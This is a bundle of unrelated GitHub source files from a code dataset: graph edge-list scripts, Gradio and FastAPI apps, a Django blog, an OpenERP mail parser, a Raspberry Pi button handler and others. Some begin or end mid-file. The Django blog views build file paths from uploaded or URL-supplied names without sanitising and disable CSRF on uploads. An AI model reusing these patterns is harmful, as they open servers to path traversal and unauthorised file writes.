Hopkins55\",\"Middlebury45\",\"Pepperdine86\",\"Smith60\",\"Tufts18\",\"UCSD34\",\"USC35\",\"Wake73\",\n\"BU10\",\"Caltech36\",\"GWU54\",\"Lehigh96\",\"Mississippi66\",\"Princeton12\",\"Stanford3\",\"Tulane29\",\"UChicago30\",\"USF51\",\"WashU32\",\n\"Baylor93\",\"Carnegie49\",\"Georgetown15\",\"MIT8\",\"NYU9\",\"Swarthmore42\",\"UC33\",\"UConn91\",\"USFCA72\",\"Wellesley22\",\n\"Berkeley13\",\"Colgate88\",\"Hamilton46\",\"MSU24\",\"Northeastern19\",\"Reed98\",\"Syracuse56\",\"UC61\",\"UF21\",\"UVA16\",\"Wesleyan43\",\n\"Bingham82\",\"Columbia2\",\"Harvard1\",\"MU78\",\"Northwestern25\",\"Rice31\",\"Temple83\",\"UC64\",\"UGA50\",\"Vanderbilt48\",\"William77\"]\n\ndef generate_edges(folder_name):\n\n PREFIX = \"data/\" + folder_name + \"/\" + folder_name\n FILE = PREFIX + \".edgelist\"\n OUTFILE = PREFIX + \"_bidirectional.edgelist\"\n\n os.system(\"rm -rf \" + PREFIX + \"_bidirectional_male.edgelist\")\n os.system(\"rm -rf \" + PREFIX + \"_bidirectional_female.edgelist\")\n\n with open(FILE, \"r\") as f:\n edges = f.readlines()\n\n result = \"\"\n\n for edge in edges:\n edge_split = edge.split()\n left = int(edge_split[0])\n right = int(edge_split[1])\n result += edge_split[0]+\"\\t\"+edge_split[1]+\"\\n\"\n result += edge_split[1]+\"\\t\"+edge_split[0]+\"\\n\"\n \n with open(OUTFILE, \"w\") as f:\n f.write(result)\n\n\nfor univ in univs:\n print(univ)\n generate_edges(univ)\n","repo_name":"vikramkarthikeyan/facebook-motif-analysis","sub_path":"bidirectional.py","file_name":"bidirectional.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4428815347","text":"import gradio as gr\nfrom tabs import kgVisualizationTab, eventExtractionTab, questionAnswerTab, UniversalEventDetectorTab, eventVisualizationTab, esgClassificationTab\n\ntitle = \"Coypu MoD\"\n\n'''main gradio function that defines all tabs'''\nwith gr.Blocks(css=\"#row {height: 100%} .gradio-container {background-color: #E8E8DC}\", title=title) as demo:\n with gr.Row():\n img_funny_coy = 
gr.Image(\"./images/colored_top_image.svg\")\n with gr.Tab('KG Connect & Visualization'):\n kgVisualizationTab.render()\n #with gr.Tab('Knowledge Extraction'):\n # knowledgeExtractionTab.render()\n with gr.Tab('Event Extraction'):\n eventExtractionTab.render()\n with gr.Tab('Universal Event Detection'):\n UniversalEventDetectorTab.render()\n # with gr.Tab('Event Visualization'):\n # eventVisualizationTab.render()\n with gr.Tab('Question Answering'):\n questionAnswerTab.render()\n\n with gr.Tab('ESG Classification'):\n esgClassificationTab.render()\n \nif __name__ == \"__main__\":\n demo.launch(server_name=\"0.0.0.0\")\n","repo_name":"semantic-systems/SEMS-tool-suite","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31604567250","text":"from fastapi import FastAPI, status\nfrom fastapi.responses import JSONResponse\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom src.routes.post import router as Post\n\nimport src.database as database\nimport src.models as models\n\n# Initialize database with downloaded data from external API\ndatabase.initialize_collection_posts()\n\n# Add openAPI tags to Swagger\nopenapi_tags = [\n {\n \"name\": \"Post\",\n \"description\": \"Endpoints are responsible for post operations.\",\n },\n]\n\n# Create FastAPI app\napp = FastAPI(\n title=\"Server\",\n openapi_tags=openapi_tags,\n)\n\n# Add Middleware\norigins = [\"*\"]\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=False,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n# Include router\napp.include_router(Post)\n\n\n@app.get(\"/\", status_code=200, response_model=models.Content, tags=[\"Root\"])\nasync def root():\n \"\"\"\n The endpoint is responsible for returning simple hello message to check if server container is running.\n \"\"\"\n content = {\n \"status\": \"success\",\n \"message\": \"Hello World from the server container!\",\n }\n return JSONResponse(status_code=status.HTTP_200_OK, content=content)\n","repo_name":"matusstas/testovacie-zadanie","sub_path":"server/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18666686756","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\"\"\"\n给你一个数组 prices ,其中 prices[i] 是商店里第 i 件商品的价格。\n\n商店里正在进行促销活动,如果你要买第 i 件商品,那么你可以得到与 prices[j] 相等的折扣,其中 j 是满足 j > i 且 prices[j] <= prices[i] 的 最小下标 ,如果没有满足条件的 j ,你将没有任何折扣。\n\n请你返回一个数组,数组中第 i 个元素是折扣后你购买商品 i 最终需要支付的价格。\n\"\"\"\n\n\nclass Solution:\n def finalPrices(self, prices):\n if len(prices) == 1:\n return prices\n final_prices = []\n for i in range(len(prices) - 1):\n price = prices[i]\n for j in range(i + 1, len(prices)):\n if prices[j] <= price:\n price = price - prices[j]\n break\n final_prices.append(price)\n final_prices.append(prices[-1])\n return final_prices\n\n\nprices = [8, 4, 6, 2, 3]\nsol = Solution()\nres = sol.finalPrices(prices)\nprint(res)\n","repo_name":"LikeSco/learn-python","sub_path":"py-exam/1475.finalPrices.py","file_name":"1475.finalPrices.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"42605774166","text":"from setuptools import setup\nimport codecs\nimport os\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith codecs.open(os.path.join(here, 
\"README.md\"), encoding=\"utf-8\") as fh:\n long_description = \"\\n\" + fh.read()\n\nVERSION = \"0.0.10\"\nDESCRIPTION = \"AWS CLI MFA - Easily Manage Session Token\"\nLONG_DESCRIPTION = \"Use MFA to increase the security of your AWS environment. Signing in with MFA requires an authentication code from an MFA device.\"\n\n# Setting up\nsetup(\n name=\"cli-aws-mfa\",\n version=VERSION,\n author=\"imajeetyadav (Ajeet Yadav)\",\n author_email=\"\",\n description=DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n long_description=long_description,\n packages=[\"MFA\"],\n keywords=[\"aws\", \"mfa\", \"virtual\"],\n py_modules=[\"cli\"],\n entry_points={\n \"console_scripts\": [\n \"cli-aws-mfa = cli:mfa\",\n ]\n },\n install_requires=[\"click\", \"boto3\"],\n)\n","repo_name":"imajeetyadav/aws-cli-mfa","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25069712517","text":"pidfile = 'main_notification.pid'\nworker_tmp_dir = '/dev/shm'\nworker_class = 'gthread'\nworkers = 1\nworker_connections = 1000\ntimeout = 30\nkeepalive = 2\nthreads = 2\nproc_name = 'main_notification'\nbind = '0.0.0.0:5002'\nbacklog = 2048\naccesslog = '-'\nerrorlog = '-'","repo_name":"casperbh96/Flask-Stripe-MySQL-Bootstrapped","sub_path":"app/Gunicorn/guni_notification.py","file_name":"guni_notification.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"77"} +{"seq_id":"25777838947","text":"# Rename key of a dictionary\r\n# Write a program to rename a key city to a location in the following dictionary.\r\n\r\ndef check_element(sample_dict,key,repkey):\r\n keyValue = sample_dict.pop(key)\r\n sample_dict[repkey] = keyValue\r\n return sample_dict \r\n\r\nif __name__ == '__main__':\r\n sample_dict = {\r\n \"name\": \"Kelly\",\r\n \"age\":25,\r\n \"salary\": 8000,\r\n \"city\": \"New york\"\r\n}\r\n key = input(\"Enter the key: \")\r\n repkey = input(\"Enter the key replace: \")\r\n result=check_element(sample_dict,key,repkey)\r\n print(result)","repo_name":"iamanuragsaini/Python-Expert","sub_path":"Problems/Dictionary/Problem8.py","file_name":"Problem8.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"3739709980","text":"import RPi.GPIO as GPIO # Import Raspberry Pi GPIO library\nimport subprocess\nglobal counter\nimport time\nimport vlc\ncounter = 0\nglobal launch, kill\nlaunch = vlc.MediaPlayer(\"file:///home/pi/PiGlassv2/launch.mp3\")\nkill = vlc.MediaPlayer(\"file:///home/pi/PiGlassv2/kill.mp3\")\nimport psutil\n\ndef checkIfProcessRunning(processName):\n '''\n Check if there is any running process that contains the given name processName.\n '''\n #Iterate over the all the running process\n for proc in psutil.process_iter():\n try:\n # Check if process name contains the given name string.\n if processName.lower() in proc.name().lower():\n return True\n except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\n pass\n return False;\n\ndef button_callback(channel):\n global counter, launch, kill\n counter += 1\n print(\"counter: \"+str(counter))\n print(\"Mod: \"+str(counter%2))\n if(counter%2 == 1):\n print(\"Launcher\")\n #subprocess.Popen([\"sudo\", \"mpg123\", \"/home/pi/PiGlassv2/launcher.mp3\"], shell=False)\n launch.play()\n launch = 
vlc.MediaPlayer(\"file:///home/pi/PiGlassv2/launch.mp3\")\n# time.sleep(2)\n subprocess.Popen([\"python3\", \"/home/pi/PiGlassv2/newmenu.py\"], shell=False)\n elif(counter%2 == 0):\n if checkIfProcessRunning('kodi'):\n print('kodi is running')\n subprocess.Popen([\"sudo\", \"systemctl\", \"restart\", \"lightdm.service\"], shell=False) \n else:\n print('No kodi process was running')\n# subprocess.Popen([\"sudo\", \"systemctl\", \"restart\", \"lightdm.service\"], shell=False) \n print(\"Killed\")\n #subprocess.Popen([\"sudo\", \"mpg123\", \"/home/pi/PiGlassv2/killing.mp3\"], shell=False)\n kill.play()\n kill = vlc.MediaPlayer(\"file:///home/pi/PiGlassv2/kill.mp3\")\n time.sleep(3)\n subprocess.Popen(['sudo', 'killall', \"raspivid\", \"ffmpeg\", \"steamlink\", 'kodi.bin_v7', 'retroarch', 'emulationstatio', 'python3'], shell=False)\n print(\"Button was pushed!\")\n\nGPIO.setwarnings(False) # Ignore warning for now\nGPIO.setmode(GPIO.BCM) # Use physical pin numbering\nGPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) # Set pin 10 to be an input pin and set initial value to be pulled low (off)\n\nGPIO.add_event_detect(17,GPIO.RISING,callback=button_callback, bouncetime=3000) # Setup event on pin 10 rising edge\n\n#message = input(\"Press enter to quit\\n\\n\") # Run until someone presses enter\n\nwhile True:\n time.sleep(.5)\n\n\nGPIO.cleanup() # Clean up\n","repo_name":"matt-desmarais/PiGlassv2","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"41904006899","text":"#from utils import *\nimport pickle\nimport tensorflow as tf\nimport numpy as np\n\ndef lrelu(x, leak=0.2, name=\"lrelu\"):\n return tf.maximum(x, leak * x)\n\nclass SingleAE(object):\n def __init__(self, shape, para, data, layer_idx, activation_fun1, activation_fun2):\n self.para = para\n self.data = data\n self.layer_idx = layer_idx\n\n self.x = tf.placeholder(tf.float32, [None, shape[0]])\n self.dropout = tf.placeholder(tf.float32)\n self.lr = tf.placeholder(tf.float32)\n\n self.var_list = []\n with tf.variable_scope('SAE') as scope:\n stddev = 1.0 / np.sqrt(shape[0])\n self.x_c = tf.nn.dropout(self.x, self.dropout)\n self.W1 = tf.Variable(tf.random_normal([shape[0], shape[1]], stddev=stddev), name=\"W1\")\n self.b1 = tf.Variable(tf.zeros([shape[1]], name='b1'))\n self.h = tf.add(tf.matmul(self.x_c, self.W1), self.b1)\n if activation_fun1 != None:\n self.h = activation_fun1(self.h)\n self.h = tf.nn.dropout(self.h, self.dropout)\n\n stddev = 1.0 / np.sqrt(shape[1])\n self.W2 = tf.Variable(tf.random_normal([shape[1], shape[0]], stddev=stddev), name='W2')\n self.b2 = tf.Variable(tf.zeros([shape[0]], name='b2'))\n self.x_hat = tf.add(tf.matmul(self.h, self.W2), self.b2)\n if activation_fun2 != None:\n self.x_hat = activation_fun2(self.x_hat)\n\n self.var_list.extend([self.W1, self.b1, self.W2, self.b2])\n\n self.loss = tf.reduce_mean(tf.square(self.x - self.x_hat))\n self.opt = tf.train.AdamOptimizer(learning_rate=self.lr).minimize(loss=self.loss, var_list=self.var_list)\n\n gpu_config = tf.ConfigProto()\n gpu_config.gpu_options.allow_growth = True\n self.sess = tf.Session(config=gpu_config)\n self.sess.run(tf.global_variables_initializer())\n\n def doTrain(self):\n num_samples = len(self.data)\n lr = self.para['lr']\n\n for i in range(self.para['iters']):\n batch_indices = np.random.randint(num_samples, size=self.para['batch_size'])\n batch_x = self.data[batch_indices,:]\n 
self.sess.run(self.opt, feed_dict={self.x: batch_x, self.dropout: self.para['dropout'], self.lr: lr})\n\n if i % 1000 == 0:\n error = self.sess.run(self.loss, feed_dict={self.x: self.data, self.dropout: 1.0})\n print('pretrain layer-{}, epoch-{}: {}'.format(self.layer_idx, i, error))\n\n if i % 20000 == 0:\n lr /= 10.0\n \n def getWb(self):\n return self.sess.run([self.W1, self.b1, self.W2, self.b2])\n\n def getH(self):\n return self.sess.run(self.h, feed_dict={self.x: self.data, self.dropout: 1.0})\n\n def close(self):\n return self.sess.close()\n \nclass PreTrainer(object):\n\n def __init__(self, config):\n self.config = config\n self.rel_input_dim = config['rel_input_dim']\n self.att_input_dim = config['att_input_dim']\n self.rel_shape = config['rel_shape']\n self.att_shape = config['att_shape']\n self.pretrain_params_path = config['pretrain_params_path']\n\n self.W_init = {}\n self.b_init = {}\n\n\n def pretrain(self, data, modal):\n\n if modal == 'rel':\n shape = [self.rel_input_dim] + self.rel_shape\n elif modal == 'att':\n shape = [self.att_input_dim] + self.att_shape\n\n for i in range(len(shape) - 1):\n print (shape[i], shape[i+1])\n\n\n activation_fun1 = lrelu\n activation_fun2 = lrelu\n if i == 0:\n activation_fun2 = tf.nn.sigmoid\n if modal == 'att':\n activation_fun2 = None\n if i == len(shape) - 2:\n activation_fun1 = None\n\n\n SAE = SingleAE([shape[i], shape[i + 1]],\n {\"iters\": 50000, \"batch_size\": 256, \"lr\": 1e-3, \"dropout\": 0.8}, data,\n i, activation_fun1, activation_fun2)\n SAE.doTrain()\n W1, b1, W2, b2 = SAE.getWb()\n\n name = modal + \"_encoder\" + str(i)\n self.W_init[name] = W1\n self.b_init[name] = b1\n name = modal + \"_decoder\" + str(len(shape) - i - 2)\n self.W_init[name] = W2\n self.b_init[name] = b2\n\n data = SAE.getH()\n\n with open(self.pretrain_params_path, 'wb') as handle:\n pickle.dump([self.W_init, self.b_init], handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\n","repo_name":"CangtianM/FATNet","sub_path":"FATNet/pretrain.py","file_name":"pretrain.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13980176878","text":"# -*- coding: utf-8 -*-\n# emulation of IMDb plugin for calling CSFD plugin because not all plugins can call CSFD directly\n# CSFD is Czech and Slovak Movie Database\n\nfrom Plugins.Plugin import PluginDescriptor\t # @UnusedImport\nfrom Screens.Screen import Screen\nfrom Components.ActionMap import ActionMap\nfrom Components.Button import Button\nimport traceback\n\nclass IMDB(Screen):\n\tskin = \"\"\"\n\t\t\n\t\t\t\n\t\t\"\"\"\n\n\tdef __init__(self, session, eventName, callbackNeeded=False):\n\t\tScreen.__init__(self, session)\n\t\tself.session = session\n\t\tself.eventName = eventName\n\t\tself.callbackNeeded = callbackNeeded\n\t\tself.ret = None\n\t\tself[\"key_red\"] = Button(\"\")\n\t\tself[\"actions\"] = ActionMap([\"IMDBemu\"],\n\t\t{\n\t\t\t\"cancel\": self.exit\n\t\t}, -1)\n\t\tself.onShown.append(self.CSFDemu)\n\n\tdef CSFDemu(self):\n\t\ttry:\n\t\t\tfrom Plugins.Extensions.CSFD.plugin import CallCSFD\t # @UnresolvedImport\n\t\t\tself.ret = CallCSFD(session=self.session, eventName=self.eventName, callbackNeeded=self.callbackNeeded)\n\t\texcept:\n\t\t\tprint(\"IMDB emulator for CSFD - error\")\n\t\t\terr = traceback.format_exc()\n\t\t\tprint(err)\n\t\t\tpass\n\t\tself.exit()\n\n\tdef exit(self):\n\t\tif self.callbackNeeded:\n\t\t\tself.close(self.ret)\n\t\telse:\n\t\t\tself.close()\n\ndef Plugins(**kwargs):\n\treturn 
[]\n","repo_name":"skyjet18/enigma2-plugin-extensions-csfd","sub_path":"IMDb/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"74612187768","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals,print_function\nfrom django.urls import reverse\nfrom django.http import HttpResponse,HttpResponseRedirect,JsonResponse,HttpResponseNotFound\nfrom django.shortcuts import render\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.files import File\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.models import User\nimport os\nimport shutil\nfrom app_blog.models import PostClass,Post,APP_FILE_ROOT,APP_TEMPLETE_ROOT\n\n\n# 博客首页\n# /blog\ndef blog(request):\n if request.method == 'GET':\n post_classes = PostClass.objects.all()\n active = request.GET.get('active',None)\n if active is None: # 按分类展示\n active = post_classes[0].name\n return HttpResponseRedirect(reverse('app_blog')+'?active='+active)\n active_post_class = PostClass.objects.filter(name=active)[0]\n posts = Post.objects.filter(post_class__name=active).order_by(\"publish_time\")\n for post in posts:\n tmp_keywords = []\n if str(post.keywords):\n for keyword in str(post.keywords).split(';'):\n tmp_keywords.append(keyword)\n post.keywords = tmp_keywords\n else:\n post.keywords = []\n return HttpResponse(render(request, APP_TEMPLETE_ROOT+'index.html', {\\\n 'title':'博客',\\\n 'active':active,\\\n 'active_post_class':active_post_class,\\\n 'left_list':post_classes,\\\n 'content_list':posts,\\\n }))\n elif request.method == 'POST':\n purpose = request.POST.get('purpose',None)\n if purpose == 'new' and request.user.is_authenticated:\n try:\n #表单提交处理:新建文档,对文件主体的操作转到编辑器页面进行\n user = User.objects.filter(username=request.user.username)[0]\n post_class_id = request.POST.get('postclass',None)\n post_class = PostClass.objects.get(id=int(post_class_id))\n new_title = request.POST.get('title',None)\n new_keywords = request.POST.get('keywords',None)\n new_description = request.POST.get('description',None)\n new_post = Post.objects.create(post_class=post_class,user=user,title=new_title,keywords=new_keywords,description=new_description)\n new_post.save()\n new_post_id = new_post.id\n upload_file = request.FILES.get('file',None)\n new_postfile = upload_file\n if upload_file is None:\n f = open(APP_FILE_ROOT+str(new_post_id)+'.md','w+')\n new_postfile = File(f)\n new_postfile.write('')\n new_postfile.name = str(new_post_id)+'.md'\n new_post.content = new_postfile\n new_post.save()\n f.close()\n os.remove(APP_FILE_ROOT+str(new_post_id)+'.md')\n else:\n new_postfile.name = str(new_post_id)+'.md'\n new_post.content = new_postfile\n new_post.save()\n return HttpResponseRedirect(reverse('app_blog_editmd')+'?path=blog/post/'+str(new_post_id)+'&name='+str(new_post_id)+'.md'+'&title='+new_title)\n except:\n messages.error(request,'操作失败!')\n return HttpResponseRedirect(request.path)\n\n\n# 编辑器页。可直接访问,也可通过iframe嵌入。新建文档、编辑文档的实际执行者\n# /blog/editmd\ndef editmd(request):\n if request.method == 'GET':\n #返回编辑器页面\n arg_path = request.GET.get('path', None)\n arg_name = request.GET.get('name', None)\n html_name = arg_name.split('.')[0]+'.html'\n arg_title = request.GET.get('title',None)\n try:\n return HttpResponse(render(request,'common/editmd.html',{\\\n 'path': arg_path,\\\n 'name': arg_name,\\\n 'html_name': html_name,\\\n 
'title':arg_title,\\\n }))\n except:\n messages.error(request,'无效文档信息!')\n return HttpResponseRedirect(reverse('app_blog')+'post/')\n\n\n# 文章页\n# 不显示左侧,内容+右侧信息\n# /blog/post/postid\ndef post(request, post_id):\n #GET直接请求网页\n if request.method == 'GET':\n post_classes = PostClass.objects.all()\n content_post = []\n #1.尝试读取选定的文章\n try:\n content_post = Post.objects.filter(id=post_id)[0]\n except:\n html_404 = '
<html><body><h1>Not Found</h1><p>The requested URL %s was not found on this server.</p></body></html>
' %request.path\n return HttpResponseNotFound(html_404)\n #2.尝试读取文档对应的文件,若没有则默认为空\n content_post_file = ''\n try:\n content_post_file = content_post.content.read()\n except:\n pass\n return HttpResponse(render(request, 'app_blog/post.html',{\\\n 'title':content_post.title,\\\n 'left_list':post_classes,\\\n 'content_post':content_post,\\\n 'content_post_file':content_post_file,\\\n }))\n #POST操作文档域\n elif request.method == 'POST':\n purpose = request.POST.get('purpose',None)\n content_post = Post.objects.filter(id=post_id)[0]\n if purpose is not None and request.user.is_authenticated and request.user.username == content_post.user.username:\n try:\n #表单提交处理:修改当前文档,对文件主体的操作转到编辑器页面进行\n if purpose == 'edit':\n new_title = request.POST.get('title',None)\n new_keywords = request.POST.get('keywords',None)\n new_description = request.POST.get('description',None)\n content_post.title=new_title #更新数据直接赋值即可\n content_post.keywords=new_keywords\n content_post.description=new_description\n content_post.save()\n return HttpResponseRedirect(reverse('app_blog_editmd')+'?path=blog/post/'+str(post_id)+'&name='+str(post_id)+'.md'+'&title='+new_title)\n #表单提交处理:删除当前文档及其文件目录,成功后返回到栏目页\n elif purpose == 'delete':\n content_post.delete()\n shutil.rmtree(APP_FILE_ROOT+str(post_id))\n return HttpResponseRedirect(reverse('app_blog'))\n # 表单提交处理:由editmd提交,保存修改,保存完成后仍然留在editmd页面\n elif purpose == 'save':\n arg_path = request.POST.get('path', None)\n arg_id = arg_path.split('/')[-1]\n text_md = request.POST.get('editormd-markdown-textarea', None)\n text_html = request.POST.get('editormd-html-textarea', None)\n\n # md file\n f1 = open(APP_FILE_ROOT + str(arg_id) + '.md', 'w+') # 在文件系统中打开临时文件暂存\n new_docfile = File(f1)\n new_docfile.write(text_md)\n new_docfile.name = str(arg_id) + '.md'\n content_post.content.delete() # 必须先删除旧文件再保存,否则django会自动另存为新文件并添加随机后缀\n content_post.content = new_docfile\n\n # html file\n f2 = open(APP_FILE_ROOT + str(arg_id) + '.html', 'w+') # 在文件系统中打开临时文件暂存\n new_docfile_html = File(f2)\n new_docfile_html.write(text_html)\n new_docfile_html.name = str(arg_id) + '.html'\n if content_post.content_html is not None:\n content_post.content_html.delete() # 必须先删除旧文件再保存,否则django会自动另存为新文件并添加随机后缀\n content_post.content_html = new_docfile_html\n\n content_post.save()\n f1.close()\n f2.close()\n os.remove(APP_FILE_ROOT + str(arg_id) + '.md') # 删除临时文件\n os.remove(APP_FILE_ROOT + str(arg_id) + '.html') # 删除临时文件\n return HttpResponse(str(arg_id) + \".md:保存成功!\")\n except:\n messages.error(request,'操作失败!')\n return HttpResponseRedirect(request.path)\n\n\n# 在editmd页面里的导出文件操作,无对应模板\n# /blog/post/postid/postname\ndef filed(request,post_id,post_name):\n if post_id is not None and post_name is not None:\n #返回文档实体文件.html内容。此处的GET参数由前端生成,需要编解码\n if post_name.split('.')[1] == 'md':\n post = Post.objects.get(id=post_id)\n response = HttpResponse(post.content)\n response['Content-Type'] = 'application/octet-stream'\n response['Content-Disposition'] = 'attachment;filename=' + post_name\n return response\n #返回文档实体文件.md内容。此处的GET参数由前端生成,需要编解码\n elif post_name.split('.')[1] == 'html':\n post = Post.objects.get(id=post_id)\n response = HttpResponse(post.content_html)\n response['Content-Type'] = 'application/octet-stream'\n response['Content-Disposition'] = 'attachment;filename=' + post_name\n return response\n else:\n return HttpResponse('None')\n\n\n# 图片操作,无对应模板\n# /blog/post/postid/image\n# /blog/post/postid/image/imagename\n@csrf_exempt #插件的模板无法添加POST{% csrf_token %},需要对此视图函数使用此装饰器\ndef image(request,post_id,image_name):\n 
if post_id is not None:\n #在editmd页面里的图片上传处理\n if request.method == 'POST' and request.user.is_authenticated:\n try:\n upload_image = request.FILES.get('editormd-image-file',None)\n with open(APP_FILE_ROOT+str(post_id)+'/'+str(upload_image.name),'wb+') as f:\n f.write(upload_image.read())\n return JsonResponse({\\\n \"success\":1,\\\n \"message\":\"success\",\\\n \"url\":'http://'+request.get_host()+request.path +'/'+str(upload_image.name)\\\n })#get_host()获取域名,path获取去掉域名的相对网址\n except:\n return JsonResponse({\\\n \"success\":0,\\\n \"message\":\"上传失败!\",\\\n \"url\":\"null\"\\\n })\n #图片链接\n elif request.method == 'GET':\n if image_name is not None:\n with open(APP_FILE_ROOT+str(post_id)+'/'+str(image_name), 'rb') as f:\n image = f.read()\n response = HttpResponse(image)\n response['Content-Type'] = 'image/' + image_name.split('.')[-1]\n return response\n else:\n return HttpResponse('')\n","repo_name":"yanyaming/yxf_mysite_py_django","sub_path":"mysite/app_blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32808958193","text":"# https://leetcode.com/explore/challenge/card/june-leetcoding-challenge/541/week-3-june-15th-june-21st/3367/\n\nclass Solution:\n def calculateMinimumHP(self, dungeon: List[List[int]]) -> int:\n r, c = len(dungeon), len(dungeon[0])\n dp = [[float('inf') for _ in range(c)] for _ in range(r)]\n ans = [[0 for _ in range(c)] for _ in range(r)]\n dp[0][0] = ans[0][0] + dungeon[0][0]\n for i in range(1, r):\n dp[i][0] = ans[i][0] + dungeon[i][0] \n for j in range(1, c):\n dp[0][j] = ans[0][j] + dungeon[0][j]\n for i in reversed(range(r)):\n for j in reversed(range(c)):\n if i+1 >= r and j+1 >=c:\n dp[i][j] = float('inf')\n elif i+1 >= r:\n dp[i][j] = max(1, dp[i][j+1] - dungeon[i][j])\n elif j+1 >=c:\n dp[i][j] = max(1, dp[i+1][j] - dungeon[i][j])\n else:\n dp[i][j] = min(max(1, dp[i+1][j] - dungeon[i][j]), max(1, dp[i][j+1] - dungeon[i][j]))\n if dp[i][j] == float('inf'):\n dp[i][j] = max(1, 1-dungeon[i][j])\n return dp[0][0]\n","repo_name":"rmodi6/scripts","sub_path":"practice/Leetcode/3367_dungeon_game.py","file_name":"3367_dungeon_game.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11924989931","text":"from osv import osv\nfrom osv import fields\nimport re\n\n\nclass email_server_mapping_field(osv.osv):\n _name = 'email.server.mapping.field'\n _description = 'Variable to field mapping'\n _order = 'field_id, sequence, id'\n\n _columns = {\n 'email_server_id': fields.many2one('email.server', 'Email server', help='Email server configuration'),\n 'field_id': fields.many2one('ir.model.fields', 'Field', required=True, help='The model\\'s field on which the variable value will be written, if found'),\n 'pattern': fields.char('Pattern', size=128, required=True, help='Pattern which will be sarched for to find the field\\'s value.\\nPut (.*?) 
for the variable part.\\nExample : [[phone:(.*?)]].\\nIn case of full content, put only (.*), without the question mark.'),\n 'message_part': fields.selection([\n ('body', 'Body'),\n ('subject', 'Subject'),\n ('to', 'To'),\n ('cc', 'CC'),\n ('from', 'From'),\n ('reply-to', 'Reply to'),\n ('in-reply-to', 'In reply to'),\n ('date', 'Date'),\n ('references', 'References'),\n ], 'Message Part', required=True, help='This field defines the part of the email where the data will be searched for'),\n 'sequence': fields.integer('Sequence', help='Will concatenate fields contents ordered by sequence'),\n\n }\n\n _defaults = {\n 'pattern': '[[Field identifier:(.*?)]]',\n 'message_part': 'body',\n 'sequence': 1,\n }\n\nemail_server_mapping_field()\n\n\nclass email_server(osv.osv):\n _inherit = 'email.server'\n\n _columns = {\n 'mapping_field_ids': fields.one2many('email.server.mapping.field', 'email_server_id', 'Mapping fields', help='Allow to map fields with custom variables in email body'),\n }\n\n def list_mapping_fields(self, cr, uid, ids, context=None):\n \"\"\"\n Generates a list of patterns to fetch specific fields from message body\n \"\"\"\n mapping_fields_data = {}\n\n for email_server in self.browse(cr, uid, ids, context=context):\n mapping_fields_data[email_server.id] = []\n # Generates a list of patterns, format : [(field_name, pattern)]\n for mapping_field in email_server.mapping_field_ids:\n # Escape all regex special characters but (.*?) from pattern\n mapping_fields_data[email_server.id].append((mapping_field.field_id.name, mapping_field.message_part, re.sub('([[\\^$|+])', '\\\\\\\\\\\\1', mapping_field.pattern)))\n\n return mapping_fields_data\n\n def fetch_mail(self, cr, uid, ids, context=None):\n \"\"\"\n Redefine the fetch_mail method to add custm parameters\n \"\"\"\n if context is None:\n context = {}\n\n for server in self.browse(cr, uid, ids, context=context):\n # Add patterns in context\n context['mapping_fields'] = server.list_mapping_fields(context=context)[server.id]\n\n # Call to super for standard behaviour\n super(email_server, self).fetch_mail(cr, uid, [server.id], context=context)\n\n # Destroy value, it must not be reused automatically for the next mail\n del(context['mapping_fields'])\n\nemail_server()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","repo_name":"subteno-it/fetchmail_parsing","sub_path":"fetchmail.py","file_name":"fetchmail.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"28991630302","text":"import sys\nfrom query_module import Query_search, query_main\nfrom robot_explore import explore\nfrom robot_decision import robot_work_cal\nimport time\nimport zmq\nimport csv\nfrom config import Input_csv_path, Robot_self_name, Time_store_file_path\n\n#########################################\n\ndef robo_time_write_csv(file_path, myData):\n print(\"----writing data to csv file------\")\n myFile = open(file_path, 'ab')\n with myFile:\n writer = csv.writer(myFile)\n 